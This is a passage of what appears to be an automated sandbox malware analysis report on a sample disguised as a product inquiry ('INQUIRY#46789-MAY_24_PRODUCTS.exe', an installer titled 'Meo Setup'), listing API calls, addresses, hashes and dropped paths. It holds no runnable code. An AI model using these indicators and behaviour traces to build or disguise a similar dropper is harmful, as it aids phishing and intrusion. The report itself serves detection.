                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CharNext
                              • String ID:
                              • API String ID: 3213498283-0
                              • Opcode ID: ab770555e48e960fe56669f96fddfbd721eaa147c7a26f8897114aa6290c2379
                              • Instruction ID: 6852171c086a5e18157233afa161efb729644a71cbbd7347f27d1468c6bf6f98
                              • Opcode Fuzzy Hash: ab770555e48e960fe56669f96fddfbd721eaa147c7a26f8897114aa6290c2379
                              • Instruction Fuzzy Hash: 73C08CB0408F88E7C61057308134D6B7FE0AB52360F6884ABF0C073291C238AC048B2B
                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                              • GetDlgItem.USER32(?,00000408), ref: 00404A67
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                              • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                              • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                              • DeleteObject.GDI32(00000000), ref: 00404B3A
                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
                              • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                              • ShowWindow.USER32(?,00000005), ref: 00404C93
                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                              • ImageList_Destroy.COMCTL32(00000000), ref: 00404E63
                              • GlobalFree.KERNEL32(00000000), ref: 00404E73
                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
                              • ShowWindow.USER32(?,00000000), ref: 00405012
                              • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                              • ShowWindow.USER32(00000000), ref: 00405024
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $M$N
                              • API String ID: 1638840714-813528018
                              • Opcode ID: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                              • Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
                              • Opcode Fuzzy Hash: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                              • Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58
                              APIs
                              • GetDlgItem.USER32(?,000003FB), ref: 00404520
                              • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                              • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
                              • CoTaskMemFree.OLE32(00000000), ref: 00404606
                              • lstrcmpiA.KERNEL32(Call,Meo Setup: Installing), ref: 00404638
                              • lstrcatA.KERNEL32(?,Call), ref: 00404644
                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                                • Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3
                                • Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe",76193410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                • Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                • Part of subcall function 0040620A: CharNextA.USER32(?,"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe",76193410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                • Part of subcall function 0040620A: CharPrevA.USER32(?,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                              • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 00404714
                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F
                                • Part of subcall function 00404888: lstrlenA.KERNEL32(Meo Setup: Installing,Meo Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                                • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,Meo Setup: Installing), ref: 00404941
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort$Call$Meo Setup: Installing
                              • API String ID: 2624150263-1970405300
                              • Opcode ID: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                              • Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
                              • Opcode Fuzzy Hash: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                              • Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D
                              APIs
                                • Part of subcall function 6E131215: GlobalAlloc.KERNEL32(00000040,6E131233,?,6E1312CF,-6E13404B,6E1311AB,-000000A0), ref: 6E13121D
                              • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6E131BA2
                              • lstrcpyA.KERNEL32(00000008,?), ref: 6E131BEA
                              • lstrcpyA.KERNEL32(00000408,?), ref: 6E131BF4
                              • GlobalFree.KERNEL32(00000000), ref: 6E131C07
                              • GlobalFree.KERNEL32(?), ref: 6E131CE7
                              • GlobalFree.KERNEL32(?), ref: 6E131CEC
                              • GlobalFree.KERNEL32(?), ref: 6E131CF1
                              • GlobalFree.KERNEL32(00000000), ref: 6E131ED8
                              • lstrcpyA.KERNEL32(?,?), ref: 6E132061
                              • GetModuleHandleA.KERNEL32(00000008), ref: 6E1320D4
                              • LoadLibraryA.KERNEL32(00000008), ref: 6E1320E5
                              • GetProcAddress.KERNEL32(?,?), ref: 6E13213E
                              • lstrlenA.KERNEL32(00000408), ref: 6E132158
                              Memory Dump Source
                              • Source File: 00000003.00000002.178277557495.000000006E131000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E130000, based on PE: true
                              • Associated: 00000003.00000002.178277524359.000000006E130000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277587874.000000006E133000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277620276.000000006E135000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6e130000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                              • String ID:
                              • API String ID: 245916457-0
                              • Opcode ID: 08c149fd3fba709236b04209021e8a5f50068d0283e75aba0aede0da54d3dd0e
                              • Instruction ID: abf6c63f8a5db5843f6d3c0b823a797a6e5d139956d371d128098751d024aee9
                              • Opcode Fuzzy Hash: 08c149fd3fba709236b04209021e8a5f50068d0283e75aba0aede0da54d3dd0e
                              • Instruction Fuzzy Hash: 1C22DF71E1422ADEDB50CFE9C8847EDBBF4BB06305F71892AD1A5A3180D77459C9EB80
                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
                              • Instruction ID: 54a63a0b970f9f74e56537ecc54aa136cf23b82a2183361db5dda5742450debe
                              • Opcode Fuzzy Hash: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
                              • Instruction Fuzzy Hash: 83F0EC72604151DBD700E7A49949DFEB76CDF11324FA0057BE181F20C1CABC8A459B3A
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                              • Instruction ID: c7d8350576d698755b4cacea6fe682166efb8a165fc05e4c5726b7f1812f50b8
                              • Opcode Fuzzy Hash: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                              • Instruction Fuzzy Hash: F4E17971900706DFDB24CF58C880BAAB7F5FB44305F15842EE897A7291E738AA95CF54
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                              • Instruction ID: bf128a229d130661f6540426524f772d2f37fab74758cf72108bd9da8b00e916
                              • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                              • Instruction Fuzzy Hash: 22C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95
                              APIs
                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
                              • GetSysColor.USER32(?), ref: 00404278
                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                              • lstrlenA.KERNEL32(?), ref: 00404299
                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                              • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                              • SendMessageA.USER32(00000000), ref: 00404322
                              • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
                              • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                              • SetCursor.USER32(00000000), ref: 004043A5
                              • LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
                              • SetCursor.USER32(00000000), ref: 004043BE
                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                              • String ID: Call$N$uA@
                              • API String ID: 3103080414-2405949017
                              • Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                              • Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
                              • Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                              • Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58
                              APIs
                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                              • BeginPaint.USER32(?,?), ref: 00401047
                              • GetClientRect.USER32(?,?), ref: 0040105B
                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                              • DeleteObject.GDI32(?), ref: 004010ED
                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                              • SelectObject.GDI32(00000000,?), ref: 00401140
                              • DrawTextA.USER32(00000000,Meo Setup,000000FF,00000010,00000820), ref: 00401156
                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                              • DeleteObject.GDI32(?), ref: 00401165
                              • EndPaint.USER32(?,?), ref: 0040116E
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                              • String ID: F$Meo Setup
                              • API String ID: 941294808-4239801462
                              • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                              • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                              • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                              • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
                              • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49
                                • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                              • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
                              • wsprintfA.USER32 ref: 00405C84
                              • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                              • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
                              • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74
                                • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,80000000,00000003), ref: 00405B3D
                                • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                              • String ID: %s=%s$[Rename]
                              • API String ID: 2171350718-1727408572
                              • Opcode ID: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                              • Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
                              • Opcode Fuzzy Hash: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                              • Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD
                              APIs
                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe",76193410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                              • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                              • CharNextA.USER32(?,"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe",76193410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                              • CharPrevA.USER32(?,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                              Strings
                              • *?|<>/":, xrefs: 00406252
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040620B
                              • "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe", xrefs: 00406246
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Char$Next$Prev
                              • String ID: "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 589700163-3075248031
                              • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
